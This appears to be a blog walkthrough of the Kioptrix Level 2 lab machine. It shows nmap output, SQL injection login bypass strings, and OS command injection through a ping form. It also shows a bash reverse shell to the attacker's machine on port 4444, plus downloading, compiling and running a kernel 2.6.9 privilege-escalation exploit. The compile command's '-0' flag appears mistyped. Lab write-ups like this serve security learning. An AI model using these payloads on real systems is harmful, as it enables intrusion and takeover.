Kioptrix Level 2 challenge was quite hard compared to the Kioptrix Level 1. we have to have the understanding the web application and should try different ways to finding vulnerability.
Requirements:
- Vmware
- Kioptrix level 2 challenge
- Kali [strictly depends on your choice]
So lets dive in:
-> Nmap 192.168.0.1/24
So my Kioptrix machine has the IP address 192.168.0.108.Lets scan the open ports and find the services running on those.
-> nmap -sV 192.168.0.108
-> nmap -sV -A 192.168.0.108
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-14 10:01 EDT
Nmap scan report for 192.168.0.108
Host is up (0.00026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 677/udp status
|_ 100024 1 680/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2017-03-14T10:40:22+00:00; -3h22m16s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:95:15:33 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 – 2.6.30
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds
So the very first thing I taught of after trying all this is to find any exploitable version. CUP 1.1 have PUT method allowed and I tried to poke around it…I got nothing. The next thing I did is see the website running on port 80.Looks like that:
As you can see in the screenshot I tried SQL Injection on the username and password. In my case ‘–‘ these comment doesnot work with the username but ‘#’ works and also SQL injection:
-> ‘or’a’=’a
works like a charm.
username: ‘or’a’=’a
password: ‘or’a’=’a
or
username: admin’ #
password: *blank*
-> Try pinging some IP and see the response. Here PHP Code Injection could occur. We can directly inject the OS commands in a stacked manner and see the output. && , ; can help us stack commands, | is called pipe and is used when we need to feed the output of one command to the input of the other but for now it is not required.
-> We can try out commands such as
whoami
uname
hostname
cat /etc/passwd
lsb_release
uname -r
-> for now lets try to open an interactive bash and connect it to our machine for better view. Write the following command on the ping input box and before doing that open a listener on your machine on any port [in my case its 4444]
->Listen on kali:
->192.168.0.1 && bash -i >& /dev/tcp/192.168.0.106/4444 0>&1
192.168.0.106 is my kali machine and a netcat is listening on that machine
Once you submit this, the page that opens up stays busy and we will be notify by netcat that we got the bash
Now this command shell is no different from the one we have been using on the web but it got a better view. If you write the command whoami, you will get a response apache that simply means that we are not root and we had the limitations of a apache user. So to get over this we need to find a vulnerability in the system internally or through any port to get our privilege escalated. So after looking around a bit, I checked the kernel version 
A little search on kernel 2.6.9 will give you exploit:
Lets download this exploit but we are not allowed to write any directory other then tmp. So lets download the exploit at /tmp/ directory and run it from there.
->wget -O /tmp/shell.c https://www.exploit-db.com/download/9542 –no-check-certificate
-> to compile the file: gcc /tmp/shell.c -0 /tmp/run
->/tmp/run
After running the exploit, we got the root access and we can check it via typing whoami command.
I changed the root password so now I could login to kioptrix and make changes that I want.
That’s how I got the root access to the Kioptrix Level 2 Challenge.